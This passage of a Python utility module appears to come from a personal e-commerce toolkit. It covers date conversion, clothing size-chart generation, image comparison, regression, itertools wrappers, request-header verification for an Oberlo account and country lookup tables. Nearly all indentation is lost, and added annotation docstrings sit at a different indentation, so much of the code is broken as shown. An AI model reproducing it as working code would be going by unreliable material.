return datetime_+timedelta(days=days-1, seconds=seconds)
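    # Worked example (my annotation): myDatetimenow packs a datetime as YY*1000 + days-since-Dec-31 + fraction-of-day,
    # and myUndatetimenow inverts it.
    """
    Date.myDatetimenow(datetime(2019, 7, 2, 12, 0))   # -> 19183.5   (19*1000 + 183 days + 0.5 of a day)
    Date.myUndatetimenow(19183.5)                     # -> datetime(2019, 7, 2, 12, 0)
    """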
def Now(self):
return datetime.now()
@staticmethod
def date(self):
return self.dateobj
def str(self):
return self.datestr
def get_month_range(self,x,year):
y = {1:[Date("01/01/%s"%(year)),Date("01/31/%s"%(year))],2:[Date("02/01/%s"%(year)),Date("02/29/%s"%(year))if(year%4 == 0)else(Date("02/28/%s"%(year)))],3:[Date("03/01/%s"%(year)),Date("03/31/%s"%(year))],4:[Date("04/01/%s"%(year)),Date("04/30/%s"%(year))],5:[Date("05/01/%s"%(year)),Date("05/31/%s"%(year))],6:[Date("06/01/%s"%(year)),Date("06/30/%s"%(year))],7:[Date("07/01/%s"%(year)),Date("07/31/%s"%(year))],8:[Date("08/01/%s"%(year)),Date("08/31/%s"%(year))],9:[Date("09/01/%s"%(year)),Date("09/30/%s"%(year))],10:[Date("10/01/%s"%(year)),Date("10/31/%s"%(year))],11:[Date("11/01/%s"%(year)),Date("11/30/%s"%(year))],12:[Date("12/01/%s"%(year)),Date("12/31/%s"%(year))]}
return y[datetime.strptime(x,"%B").month]
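    # Example (my annotation): month ranges are leap-year aware.
    """
    Date().get_month_range("February", 2020)   # -> [Date("02/01/2020"), Date("02/29/2020")]
    Date().get_month_range("February", 2019)   # -> [Date("02/01/2019"), Date("02/28/2019")]
    """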
@staticmethod
def friendlydate(x, only_date=False,**kwargs):
return swamp([lambda:datetime.strftime(x,"%A, %b %d"),
lambda:datetime.strftime(x,"%A, %b %d'%y"),
lambda:datetime.strftime(x,("%A, %b %d'%y at %I:%M %p")),
lambda:datetime.strftime(x,("%A, %b %d'%y at %I:%M:%S %p")),
lambda:datetime.strftime(x,("%A, %b %d' at %I:%M:%S %p")),
lambda:datetime.strftime(x,("%A, %b %d at %I:%M %p")),
],
[lambda:only_date==True and "with_year" not in kwargs,
lambda:only_date==True and "with_year" in kwargs,
lambda:only_date==False and "with_year" in kwargs and "seconds" not in kwargs ,
lambda:only_date==False and "with_year" in kwargs and "seconds" in kwargs,
lambda:only_date==False and "with_year" not in kwargs and "seconds" in kwargs,
lambda:only_date==False and "with_year" not in kwargs and "seconds" not in kwargs ,],)
"""
assert Date().friendlydate(datetime(2019,1,21,1,11)) == 'Monday, Jan 21 at 01:11 AM'
assert Date().friendlydate(datetime(2019,1,21,1,11),with_year=True) == "Monday, Jan 21'19 at 01:11 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),seconds=True) == "Monday, Jan 21' at 01:11:00 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),seconds=True,with_year=True) == "Monday, Jan 21'19 at 01:11:00 AM"
assert Date().friendlydate(datetime(2019,1,21,1,11),only_date=True) == 'Monday, Jan 21'
assert Date().friendlydate(datetime(2019,1,21,1,11),only_date=True,with_year=True) == "Monday, Jan 21'19"
"""
def seconds_to_text(self,x,days=True,hours=True,minutes=True,seconds=True):
x = int(x)
days_ = None
days_r = None
if days:
q = 24*60*60
days_ = int(x/q)
days_r = x%q
x = days_r
hours_ = None
hours_r = None
if hours:
q = 60*60
hours_ = int(x/q)
hours_r = x%q
x = hours_r
minutes_ = None
minutes_r = None
if minutes:
q = 60
minutes_ = int(x/q)
minutes_r = x%q
x = minutes_r
seconds_ = None
seconds_r = None
if seconds:
q = 1
seconds_ = int(x/q)
seconds_r = x%q
x = seconds_r
r = ""
if days:
r += "%s Days"%(days_)
r += ", "
if hours:
r += "%s Hours"%(hours_)
r += ", "
if minutes:
r += "%s Minutes"%(minutes_)
r += ", "
if seconds:
r += "%s Seconds"%(seconds_)
r += ", "
if r.endswith(", "):
r = r[:-2]
return r
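    # Example (my annotation):
    """
    Date().seconds_to_text(90061)   # -> "1 Days, 1 Hours, 1 Minutes, 1 Seconds"  (86400 + 3600 + 60 + 1)
    """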
def adjust_mydatetimenow__(self, data, field):
for x in data:
i = getattr(x, field)
if i < 200:
ii=i
#b.append(len(str(i)))
i = str(i)
d = str(i)[:2]
if len(i) == 5:
i = i + "0"
i = i[2:]
#print(i)
dd = (float(d)*1000)+float(i)
#print(dd)
setattr(x, field, dd)
x.save();print("saving %s->%s" %(ii,dd))
elif i < 10000:
ii=i
#print(i)
d = str(i)[:2]
i=str(i)
if len(i) != 7:
while True:
i = i+"0"
if len(i)==7:
break
i = i[2:]
dd = (float(d)*1000) + float(i)
print(dd)
setattr(x, field, dd)
x.save();print("saving %s->%s" %(ii,dd))
@staticmethod
def pastmonthdays(x):
from calendar import monthrange
count = 0
count += ((datetime.now())- datetime(datetime.now().year,datetime.now().month,1)).days
year = datetime.now().year
month = datetime.now().month
for i in range(x):
month -= 1
if month == 0:
year -= 1
month = 12
count += monthrange(year, month)[1]
print(year, month, count)
print(count)
time.sleep(0.2)
return count
def parse_date(self,w,remove_tzinfo=True,localize_timezone=False):
import dateutil.parser
x = dateutil.parser.parse(w)
y = x.astimezone()if(localize_timezone==True)else(x)
z = y.replace(tzinfo=None)if(remove_tzinfo==True)else(y)
return z
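    # Example (my annotation): requires python-dateutil; tz info is stripped by default.
    """
    Date().parse_date("2019-01-21T01:11:00+00:00")   # -> datetime(2019, 1, 21, 1, 11)
    """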
class DefensiveProgrammingBot:
@staticmethod
def defend_DefensiveProgrammingBot(io):
formats = [io, io==io]
redprint("""\nio:{}\nio==io:{}""".format(*formats))
returnable = None
assert None == returnable
return returnable
class Freelancer:
def Description(self, a):
pass
""" """
def SizeChart(self, a, html=True):
# OSA.log(a)
if "Alg1:" in a:
xz = ""
if a.endswith("&cm"):
xz = a
#a='Waist,Bust,Hips&Alg1:S-6XL,34-50,24-42,34-52'
#a='Waist,Bust,Hips&Alg1:S-6XL,34-50,24-42,34-52&cm'
# not for floats
#shints = ["Size"]+[i+" (in)" for i in eval(a.split("&")[0])]
# x-y, x-y, x-y, x-y
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg1:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg1:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg1:","").split(",",1)[1].split(",")
vorts = []
for idx, vax in enum(F):
quas = Integer(vax.split("-")[1]) - Integer(vax.split("-")[0])
stol = Integer(quas / len(chus))
h = Integer(vax.split("-")[0])
lp = len(chus)
qince = []
for i in range(lp):
print(h+(stol*i), h+(stol * (i+1)))
#qince.append("-".join(lmap(str,[h+(stol*i), h+(stol * (i+1))])))
qince.append(" - ".join(lmap(str,[ str(h+(stol*i))+'"', str(h+(stol * (i+1)))+'"' ])))
vorts.append(["%s"%shints[idx+1]]+qince)
vorts.insert(0, ["Size"]+chus)
if xz.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = re.findall("[\d\.]+",j)
for l in q:
ll = round(float(l)/2.54,2)
if str(ll).endswith(".0"):
ll = str(int(ll))
else:
ll = str(float(ll))
j = j.replace(l, ll)
vorts[idx][idx2] = j
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg2" in a:
# a = "Bust,Waist,Length&Alg2:S-2XL,88-104,72-88,104-108"
# a = "Bust,Waist,Length&Alg2:S-2XL,88-104,72-88,104-108&cm"
# a = "Bust,Waist,Length&Alg2:S-2XL,88.5-104.5,72.5-88.5,104.5-108.5&cm"
# x, x, x, x
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg2:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg2:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg2:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
a,b = i.split("-")
a = float(a)
b = float(b)
t = b- a
tt = t / (len(chus) - 1)
ly = a
o = []
for j in range(len(chus)):
if str(ly).endswith(".0"):
lyy = str(int(ly)) + '"'
else:
lyy = str(round(ly,1)) + '"'
o.append(lyy)
ly += tt
o.insert(0, shints[idx+1])
vorts.append(o)
vorts.insert(0, ["Size"] + chus)
if xz.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = str(round(float(re.findall("[\d\.]+",j)[0])/2.54,2))
if q.endswith(".0"):
q = int(q)
else:
q = float(q)
q = str(q)
vorts[idx][idx2] = q + '"'
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg3" in a:
# a = 'Bust,Waist,Hips&Alg3:S-6XL,80+5*5+7+5+5+5,60+5*5+7+5*2+5,80+5*5+7+5*2+5&cm'
# a = 'Waist,Hips,Length&Alg3:S-6XL,67+5+5+5+5+5+5+5+5,93+5+5+5+5+5+5+5+5,72.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5&cm'
# x-y, x-y, x-y, x-y
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg3:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg3:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg3:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
q = []
start = re.findall("[\d\.]+",i)[0]
i = re.sub(start,"",i,count=0)
l = []
l.extend(re.findall("\+[\d\.]+(?:\*[\d\.]+|)",i))
start = float(start)
if str(start).endswith(".0"):
start = int(start)
q.append(start)
for j in l:
if "*" not in j:
y = re.findall("\+([\d\.]+)",j)[0]
y = float(y)
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
else:
x = re.findall("\*([\d\.]+)",j)[0]
y = re.findall("\+([\d\.]+)",j)[0]
x = float(x)
y = float(y)
                        for r in range(int(x)):
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
vorts.append(q)
for idx, i in enum(vorts):
for idx2, j in enum(i[:-1]):
if "&cm" in a:
j = round(float(j/2.54),2)
if str(j).endswith(".0"):
j = str(int(j))
else:
j = str(float(j))
r = i[idx2+1]
if "&cm" in a:
r = round(float(r/2.54),2)
if str(r).endswith(".0"):
r = str(int(r))
else:
r = str(float(r))
vorts[idx][idx2] = '%s" - %s"'%(j,r)
vorts[idx].pop(-1)
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
for idx, i in enum(vorts):
i.insert(0, chus[idx])
vorts = [shints] + vorts
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
if "Alg4" in a:
# a = 'Bust,Waist,Hips&Alg4:S-6XL,80+5*5+7+5+5,60+5*5+7+5*2,80+5*5+7+5*2&cm'
# a = 'Waist,Hips,Length&Alg4:S-6XL,67+5+5+5+5+5+5+5+5,93+5+5+5+5+5+5+5+5,72.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5+0.5&cm'
# x, x, x, x
xz = ""
if a.endswith("&cm"):
xz = a
shints = ["Size"]+[i for i in a.split("&")[0].split(",")]
r = ["XS","S","M","L","XL","2XL","3XL","4XL","5XL","6XL"]
chus = r[r.index(a.split("&")[1].replace("Alg4:","").split(",")[0].split("-")[0]):r.index(a.split("&")[1].replace("Alg4:","").split(",")[0].split("-")[1])+1]
ZAMUS = []
F = a.split("&")[1].replace("Alg4:","").split(",",1)[1].split(",")
vorts = []
for idx, i in enum(F):
q = []
start = re.findall("[\d\.]+",i)[0]
i = re.sub(start,"",i,count=0)
l = []
l.extend(re.findall("\+[\d\.]+(?:\*[\d\.]+|)",i))
start = float(start)
if str(start).endswith(".0"):
start = int(start)
q.append(start)
for j in l:
if "*" not in j:
y = re.findall("\+([\d\.]+)",j)[0]
y = float(y)
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
else:
x = re.findall("\*([\d\.]+)",j)[0]
y = re.findall("\+([\d\.]+)",j)[0]
x = float(x)
y = float(y)
                        for r in range(int(x)):
start += y
if str(start).endswith(".0"):
start = int(start)
q.append(start)
vorts.append(q)
for idx, i in enum(vorts):
for idx2, j in enum(i):
if "&cm" in a:
j = round(float(j/2.54),2)
if str(j).endswith(".0"):
j = str(int(j))
else:
j = str(float(j))
vorts[idx][idx2] = '%s"'%(j)
import numpy as np
vorts = np.transpose(vorts)
vorts = [list(i) for i in vorts]
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
for idx, i in enum(vorts):
i.insert(0, chus[idx])
vorts = [shints] + vorts
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
#a = '["waist", "chest", "shoulders"]\nS:10,20,30\nM:11,22,33\nL:12,24,35'
#a = 'waist,chest,shoulders&S:10,20,30&M:11,22,33&L:12,24,35'
#a = 'Diameter&Adjustable Size:17mm'
strom = dict(zip(re.findall("(&(?:[0-9]+|[0-9]+[\w]+)):",a), set([generate_one_alphabetical_string() for i in range(10000)]))) # ie &2XL.
for zeknos, zsadf in strom.items():
a = a.replace(zeknos, "%s:"%(zsadf))
a = Replacements(a, "XXXXXXL", "6XL", "XXXXXL", "5XL", "XXXXL", "4XL", "XXXL", "3XL", "XXL", "2XL")
#@[2018.12.31 12:05:33 PM]tcer strom
for zeknos, zsadf in strom.items():
a = a.replace("%s:"%(zsadf), zeknos, )
#shints = ["Size"]+[i+" (in)" for i in eval(a.split("&")[0])]
shints = ["Size"]+[i for i in a.replace("&cm","").split("&")[0].split(",")]
#stromus = [ [xe.split(":")[0]]+(list(eval(xe.split(":")[1]))) for xe in a[1:]]
# OSA.log(a)
stromus = [ [xe.split(":")[0]]+[((i)if("-" not in i)else(i.split("-")[0].strip()+'"' + (" - ") + i.split("-")[1].strip() ))+(ifelseget(lambda:("mm" in i),lambda:"",lambda:'"')) for i in list(map(str,xe.split(":")[1].split(",")))] for xe in a.replace("&cm","").split("&")[1:] ]
vorts = [shints]+stromus
if len(oset(lmap(len,vorts))) != 1:
print("Error with Size Chart")
assert False
if a.endswith("&cm"):
for idx,i in enum(vorts):
for idx2,j in enum(i):
if j.endswith('"'):
q = re.findall("[\d\.]+",j)
for l in q:
ll = round(float(l)/2.54,2)
if str(ll).endswith(".0"):
ll = str(int(ll))
else:
ll = str(float(ll))
j = j.replace(l, ll)
vorts[idx][idx2] = j
#@decidedly inappreciate, csv_table_to_png(vorts)
if html==True:
vorts = csv_table_to_html(vorts)
return vorts
class Graph(object):
def __init__(self, *args, plot_type='scatterplot',**kwargs):
import matplotlib.pyplot as plt
ifdo(lambda:not os.path.exists(homepath("~/.matplotlib")),lambda:os.system("mkdir ~/.matplotlib && touch ~/.matplotlib/matplotlibrc && echo 'backend: agg' >> ~/.matplotlib/matplotlibrc"))
ifdo(lambda:kwargs.get("newplot")==True,lambda:plt.subplot(self.plot_number))
ifdo(lambda:plot_type=="lineplot",lambda:plt.plot(*args, "-", label=kwargs.get("label",None)))
ifdo(lambda:plot_type=="scatterplot",lambda:plt.plot(*args, "."))
ifdo(lambda:plot_type=="histogram",lambda:plt.hist(*args, bins=20))
plt.xlabel(kwargs.get("xlabel","x")), plt.ylabel(kwargs.get("ylabel","y")), plt.title(kwargs.get("title","title")), plt.legend()
plt.show()
class Handles:
    # Basically, it shows the day's sales for all shops and, if clicked, the adsets.
def __init__(self):
import rumps
from rumps import MenuItem as M
from rumps import MenuItem
self.app = rumps.App("🚀",quit_button=Null)
globals().update(locals())
self.set_menu()
#process( lambda: [time.sleep(6.15), self.set_menu()] )
time.sleep(6)
self.app.run()
def set_menu(self):
keys = list(self.app.menu.keys())
redprint(keys)
for i in keys:
self.app.menu.pop(i)
keycall("Icon",All(Adset))
keycall("post_handle",All(Adset))
self.app.menu = [MenuItem("/",callback=lambda _=None:[keycall("post_handle",All(Adset)),keycall("__call__",All(Handle)),self.set_menu()])]+\
[
MenuItem("[%s]"%(i.reach),icon=Filter(Adset,handle=i.handle)[0].Icon()) for i in keysort("reach",All(Handle),tcer=True)
]
class Headers:
def verifyheaders(self,headers=None,url=None,text=None,savefile=None,minimal_headers=None):
"""
minimal_headers=headerdict1
url='https://app.oberlo.com/ajax/import/save-title'
savefile='headers/headers1.pkl'
headers=headers1
text=''
"""
"""
headers={}
headerdict1={'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9', 'Cache-Control': 'max-age=0', 'Connection': 'keep-alive', 'Cookie': None, 'Host': 'app.oberlo.com', 'Referer': 'https://app.oberlo.com/my-products?page=1&filters%5Bkeywords%5D=&filters%5Bsync_prices_status%5D=0&filters%5Bgone_status%5D=0&filters%5Bsource%5D=0', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}
minimal_headers=headerdict1
url='https://app.oberlo.com/import'
savefile='headers/headers1.pkl'
text=''
"""
saved=copy.deepcopy(headers)
if minimal_headers:
minimal_headers.update({i:j for i,j in headers.items() if i in minimal_headers})
headers = minimal_headers
print(headers)
r=requests.get(url,headers=headers,timeout=3)
if r.url==url and r.status_code==200:
headers = [print('verified url and status code for %s'%(url)),saved][1]
else:
headers = [print('refresh headers'),self.verifyheaders(headers=self.inputheaders(text,savefile=savefile),url=url,text=text,savefile=savefile,minimal_headers=minimal_headers)][1]
return headers
def inputheaders(self,text=None,savefile=None):
headers = [input('Please clip your headers for %s, then press Enter:\n'%(text)),blocktext_to_session_headers(pyperclip.paste().replace('\r',''))].pop()
ifdo(lambda:savefile,lambda:Pickles().savepickles(headers,savefile))
return headers
class ImageComp:
def __call__(self,i1,i2,verbose = False):
self.verbose = verbose
# B = pool(Images().download,key("src",product.images))
# [[[i,j] for j in B if j!=i] for i in B]
from PIL import Image
from skimage.measure import compare_ssim as ssim
import argparse
import cv2
import imutils
import matplotlib.pyplot as plt
import numpy as np
g().update(locals())
self.fn1 = i1
self.fn2 = i2
self.i1 = cv2.imread(i1)
self.i2 = cv2.imread(i2)
self.resize()
self.test_pass_score = GLOBAL_IMAGE_COMPARISON_TEST_SCORE
return self.compare_images()
def resize(self):
shape1 = list(self.i1.shape)[:2]
if self.verbose: redprint("shape1: %s" % shape1)
shape2 = list(self.i2.shape)[:2]
if self.verbose: redprint("shape2: %s" % shape2)
if sum(shape1) > sum(shape2):
Images().resize_disregard_proportion(shape1[1], shape1[0], self.fn2, self.fn2)
if self.verbose: redprint("shape1: %s -> %s" % (shape2, (shape1[1], shape1[0])))
self.i2 = cv2.imread(self.fn2)
if self.verbose: redprint("reinitializing image %s" % "self.fn2")
shape2 = list(self.i2.shape)[:2]
if self.verbose: redprint("shape1: %s, shape2: %s" % (shape1, shape2))
if sum(shape1) < sum(shape2):
Images().resize_disregard_proportion(shape2[1], shape2[0], self.fn1, self.fn1)
if self.verbose: redprint("shape1: %s -> %s" % (shape1, (shape2[1], shape2[0])))
self.i1 = cv2.imread(self.fn1)
if self.verbose: redprint("reinitializing image %s" % "self.fn1")
shape1 = list(self.i1.shape)[:2]
if self.verbose: redprint("shape1: %s, shape2: %s" % (shape1, shape2))
else:
if self.verbose: redprint("images already same size: %s %s" % (shape1, shape2))
def mse(self):
import numpy as np
err = np.sum((self.i1.astype("float") - self.i2.astype("float")) ** 2)
err /= float(self.i1.shape[0] * self.i1.shape[1])
return err
def compare_images_2014(self):
m = self.mse()
s = None
try:s = ssim(self.i1, self.i2)
except: s = ssim(self.i1, self.i2, multichannel=True)
if self.verbose: redprint("m, %s s, %s" % (m, s))
return True if s > self.test_pass_score else False
def compare_images_2017(self):
grayA = cv2.cvtColor(self.i1, cv2.COLOR_BGR2GRAY)
grayB = cv2.cvtColor(self.i2, cv2.COLOR_BGR2GRAY)
(score, diff) = ssim(grayA, grayB, full=True)
diff = (diff * 255).astype("uint8")
if self.verbose: redprint("s: {}".format(score))
return True if score > self.test_pass_score else False
def compare_images(self):
alg1 = self.compare_images_2014()
alg2 = self.compare_images_2017()
if self.verbose: redprint("alg1: %s | alg2: %s" % (alg1, alg2))
return True if(True==alg1==alg2)else(False)
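    # Usage sketch (my example; the file names are hypothetical). Requires cv2/scikit-image and the
    # module-level GLOBAL_IMAGE_COMPARISON_TEST_SCORE threshold; True only if both SSIM variants pass.
    """
    ImageComp()("photo_a.jpg", "photo_b.jpg", verbose=True)   # -> True / False
    """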
class Inheritance:
class Inheritor:
        __call__=lambda self,x:[exec("from types import MethodType,ModuleType,FunctionType",globals()),[(bind3(self,b))if(type(b)==FunctionType)else(setitem(self.__dict__,a,b))for a,b in(x.__dict__.items())]]
pram=lambda self: print("a")
poof=lambda self: print("AA")
class B:
pram=lambda self: print("b")
poof=lambda self: print("BB")
"""
a = Inheritor()
a.pram()
a.poof()
a(B)
a.pram()
a.poof()
"""
class Itertools:
def __init__(self):
import itertools
import string
globals().update(locals())
globals().update({a:getattr(self,a) for a in dir(self)})
def set_of_ordered_set(self,x,ordered_set_size):
return list(itertools.permutations(x,ordered_set_size))
""" test """
"""x = list(range(10))
ordered_set_size = 3
a = set_of_ordered_set(x,ordered_set_size)
print(len(a))
720"""
def set_of_unordered_set(self,x,unordered_set_size):
return list(itertools.combinations(x,unordered_set_size))
""" test """
"""x = list(range(10))
unordered_set_size = 3
b = set_of_unordered_set(x,unordered_set_size)
print(len(b))
120"""
def set_of_unordered_set_with_replacement(self,x,unordered_set_with_replacement_set_size):
return list(itertools.combinations_with_replacement(x,unordered_set_with_replacement_set_size))
""" test """
"""x = list(range(10))
unordered_set_with_replacement_set_size = 3
c = set_of_unordered_set_with_replacement(x,unordered_set_with_replacement_set_size)
print(len(c))
220"""
def set_of_ordered_and_unordered_and_unordered_with_replacement_set(self,x,ordered_and_unordered_and_unordered_with_replacement_set_size):
ordered_set = set_of_ordered_set(x,ordered_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
unordered_set = set_of_unordered_set(x,unordered_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
unordered_set_with_replacement = set_of_unordered_set_with_replacement(x,unordered_set_with_replacement_set_size=ordered_and_unordered_and_unordered_with_replacement_set_size)
x = sum([ordered_set,unordered_set,unordered_set_with_replacement],[])
# x = set(x)
x = set(x)
return x
def set_of_ordered_and_unordered_and_unordered_with_replacement_set_for_alphabet(self,):
import string
x = " ".join(string.ascii_lowercase).split(" ")
y = set_of_ordered_and_unordered_and_unordered_with_replacement_set(x,ordered_and_unordered_and_unordered_with_replacement_set_size=4)
z = set(y)
a = ["".join(i) for i in z]
return a
""" test """
"""x = set_of_ordered_and_unordered_and_unordered_with_replacement_set_for_alphabet()
In [45]: len(x)
Out[45]: 367601"""
def set_product(self,x,repeat_set_size):
""" ::: lol try out [1,2,3,2,1],3 . your first thing, it had 25, this has 27. This seems to be that thing which you would have wanted. ::: """
x = list(itertools.product(x,repeat=repeat_set_size))
return x
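    """ example (my annotation): set_product is the cartesian product, order-sensitive and with repeats:
    Itertools().set_product([0, 1], 2)   # -> [(0, 0), (0, 1), (1, 0), (1, 1)]  (2**2 tuples)
    """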
class LinReg:
def __init__(self):
from sklearn.linear_model import LinearRegression
globals().update(locals())
def fit(self, X, y):
self.X = X
self.y = y
self.LinReg = LinearRegression()
self.LinReg.fit(X,y)
def score(self):
print( self.LinReg.score(self.X,self.y) )
def predict(self, x):
y = self.LinReg.predict([[x]])
return y
def dictlist_predict(self,x,fields,y_field):
X = []
for i in x:
X.append([i[v] for v in fields])
y = [i[y_field] for i in x]
new = LinReg()
new.fit(X,y)
return new
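    # Usage sketch (my example, assumes scikit-learn is installed); predict() expects a single feature.
    """
    lr = LinReg()
    lr.fit([[1], [2], [3]], [2, 4, 6])
    lr.score()      # prints ~1.0 for this perfect linear fit
    lr.predict(4)   # -> array([8.])
    """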
class Locations:
states = { 'AK': 'Alaska', 'AL': 'Alabama', 'AR': 'Arkansas', 'AS': 'American Samoa', 'AZ': 'Arizona', 'CA': 'California', 'CO': 'Colorado', 'CT': 'Connecticut', 'DC': 'District of Columbia', 'DE': 'Delaware', 'FL': 'Florida', 'GA': 'Georgia', 'GU': 'Guam', 'HI': 'Hawaii', 'IA': 'Iowa', 'ID': 'Idaho', 'IL': 'Illinois', 'IN': 'Indiana', 'KS': 'Kansas', 'KY': 'Kentucky', 'LA': 'Louisiana', 'MA': 'Massachusetts', 'MD': 'Maryland', 'ME': 'Maine', 'MI': 'Michigan', 'MN': 'Minnesota', 'MO': 'Missouri', 'MP': 'Northern Mariana Islands', 'MS': 'Mississippi', 'MT': 'Montana', 'NA': 'National', 'NC': 'North Carolina', 'ND': 'North Dakota', 'NE': 'Nebraska', 'NH': 'New Hampshire', 'NJ': 'New Jersey', 'NM': 'New Mexico', 'NV': 'Nevada', 'NY': 'New York', 'OH': 'Ohio', 'OK': 'Oklahoma', 'OR': 'Oregon', 'PA': 'Pennsylvania', 'PR': 'Puerto Rico', 'RI': 'Rhode Island', 'SC': 'South Carolina', 'SD': 'South Dakota', 'TN': 'Tennessee', 'TX': 'Texas', 'UT': 'Utah', 'VA': 'Virginia', 'VI': 'Virgin Islands', 'VT': 'Vermont', 'WA': 'Washington', 'WI': 'Wisconsin', 'WV': 'West Virginia', 'WY': 'Wyoming'}
_country_code_dict = {
'c0': 'US',
'c1': 'CA,AU,UK,NZ',
'c2': 'CN,TW,HK,SG,JP,UA,RU',
'c3': 'AE,QA,SA,GU,BH,AF,GU,IQ,TT,MC,PR,LB,TR,DM,MV,KH,MT,KW',
'c4': 'AT,CH,DK,SK,CZ,BE,FR,NO,SE'}
country_code_dict = {
        'AD': 'Andorra', 'AE': 'United Arab Emirates', 'AF': 'Afghanistan', 'AG': 'Antigua and Barbuda', 'AI': 'Anguilla', 'AL': 'Albania', 'AM': 'Armenia', 'AO': 'Angola', 'AQ': 'Antarctica', 'AR': 'Argentina', 'AS': 'American Samoa', 'AT': 'Austria', 'AU': 'Australia', 'AW': 'Aruba', 'AX': 'Aland Islands', 'AZ': 'Azerbaijan', 'BA': 'Bosnia and Herzegovina', 'BB': 'Barbados', 'BD': 'Bangladesh', 'BE': 'Belgium', 'BF': 'Burkina Faso', 'BG': 'Bulgaria', 'BH': 'Bahrain', 'BI': 'Burundi', 'BJ': 'Benin', 'BL': 'Saint Barthélemy', 'BM': 'Bermuda', 'BN': 'Brunei Darussalam', 'BR': 'Brazil', 'BS': 'Bahamas', 'BT': 'Bhutan', 'BV': 'Bouvet Island', 'BW': 'Botswana', 'BY': 'Belarus', 'BZ': 'Belize', 'CA': 'Canada', 'CC': 'Cocos (Keeling) Islands', 'CF': 'Central African Republic', 'CG': 'Congo', 'CH': 'Switzerland', 'CI': "Côte d'Ivoire", 'CK': 'Cook Islands', 'CL': 'Chile', 'CM': 'Cameroon', 'CN': 'China', 'CO': 'Colombia', 'CR': 'Costa Rica', 'CU': 'Cuba', 'CV': 'Cape Verde', 'CW': 'Curaçao', 'CX': 'Christmas Island', 'CY': 'Cyprus', 'CZ': 'Czech Republic', 'DE': 'Germany', 'DJ': 'Djibouti', 'DK': 'Denmark', 'DM': 'Dominica', 'DO': 'Dominican Republic', 'DZ': 'Algeria', 'EC': 'Ecuador', 'EE': 'Estonia', 'EG': 'Egypt', 'EH': 'Western Sahara', 'ER': 'Eritrea', 'ES': 'Spain', 'ET': 'Ethiopia', 'FI': 'Finland', 'FJ': 'Fiji', 'FK': 'Falkland Islands (Malvinas)', 'FO': 'Faroe Islands', 'FR': 'France', 'GA': 'Gabon', 'GB': 'United Kingdom', 'GD': 'Grenada', 'GE': 'Georgia', 'GF': 'French Guiana', 'GG': 'Guernsey', 'GH': 'Ghana', 'GI': 'Gibraltar', 'GL': 'Greenland', 'GM': 'Gambia', 'GN': 'Guinea', 'GP': 'Guadeloupe', 'GQ': 'Equatorial Guinea', 'GR': 'Greece', 'GS': 'South Georgia and the South Sandwich Islands', 'GT': 'Guatemala', 'GU': 'Guam', 'GW': 'Guinea-Bissau', 'GY': 'Guyana', 'HK': 'Hong Kong', 'HM': 'Heard Island and McDonald Islands', 'HN': 'Honduras', 'HR': 'Croatia', 'HT': 'Haiti', 'HU': 'Hungary', 'ID': 'Indonesia', 'IE': 'Ireland', 'IL': 'Israel', 'IM': 'Isle of Man', 'IN': 'India', 'IO': 'British Indian Ocean Territory', 'IQ': 'Iraq', 'IS': 'Iceland', 'IT': 'Italy', 'JE': 'Jersey', 'JM': 'Jamaica', 'JO': 'Jordan', 'JP': 'Japan', 'KE': 'Kenya', 'KG': 'Kyrgyzstan', 'KH': 'Cambodia', 'KI': 'Kiribati', 'KM': 'Comoros', 'KN': 'Saint Kitts and Nevis', 'KW': 'Kuwait', 'KY': 'Cayman Islands', 